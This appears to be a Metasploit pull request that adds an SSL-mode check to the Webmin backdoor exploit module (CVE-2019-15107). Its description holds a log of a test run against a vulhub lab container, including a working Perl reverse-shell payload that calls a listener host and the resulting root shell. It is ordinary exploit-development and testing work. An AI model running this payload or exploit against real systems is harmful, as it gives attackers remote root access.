### PR TITLE
Check SSL in exploit/linux/http/webmin_backdoor

### DIFF
--- a/modules/exploits/linux/http/webmin_backdoor.rb
+++ b/modules/exploits/linux/http/webmin_backdoor.rb
@@ -94,6 +94,11 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown
     end
 
+    if res.body.include?('This web server is running in SSL mode.')
+      print_error('Please enable the SSL option to proceed')
+      return CheckCode::Unknown
+    end
+
     version =
       res.headers['Server'].to_s.scan(%r{MiniServ/([\d.]+)}).flatten.first
 


### PR DESCRIPTION
When testing against https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107.

```
msf5 exploit(linux/http/webmin_backdoor) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
********************
####################
# Request:
####################
GET / HTTP/1.1
Host: 127.0.0.1:10000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.0 200 Document follows
Server: MiniServ/1.910
Date: Thu, 16 Jan 2020 20:46:45 GMT
Content-type: text/html; Charset=iso-8859-1
Connection: close

<h1>Error - Document follows</h1>
<p>This web server is running in SSL mode. Try the URL <a href='https://560c99a02666:10000/'>https://560c99a02666:10000/</a> instead.<br></p>

[-] Please enable the SSL option to proceed
[-] Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
msf5 exploit(linux/http/webmin_backdoor) > set ssl true
ssl => true
msf5 exploit(linux/http/webmin_backdoor) > set httptrace false
httptrace => false
msf5 exploit(linux/http/webmin_backdoor) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Webmin 1.910 detected
[+] Webmin 1.910 is a supported target
[+] Webmin executed a benign check command
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Generated command payload: perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.56.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:52467) at 2020-01-16 14:46:55 -0600

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux 560c99a02666 4.9.184-linuxkit #1 SMP Tue Jul 2 22:58:16 UTC 2019 x86_64 GNU/Linux
```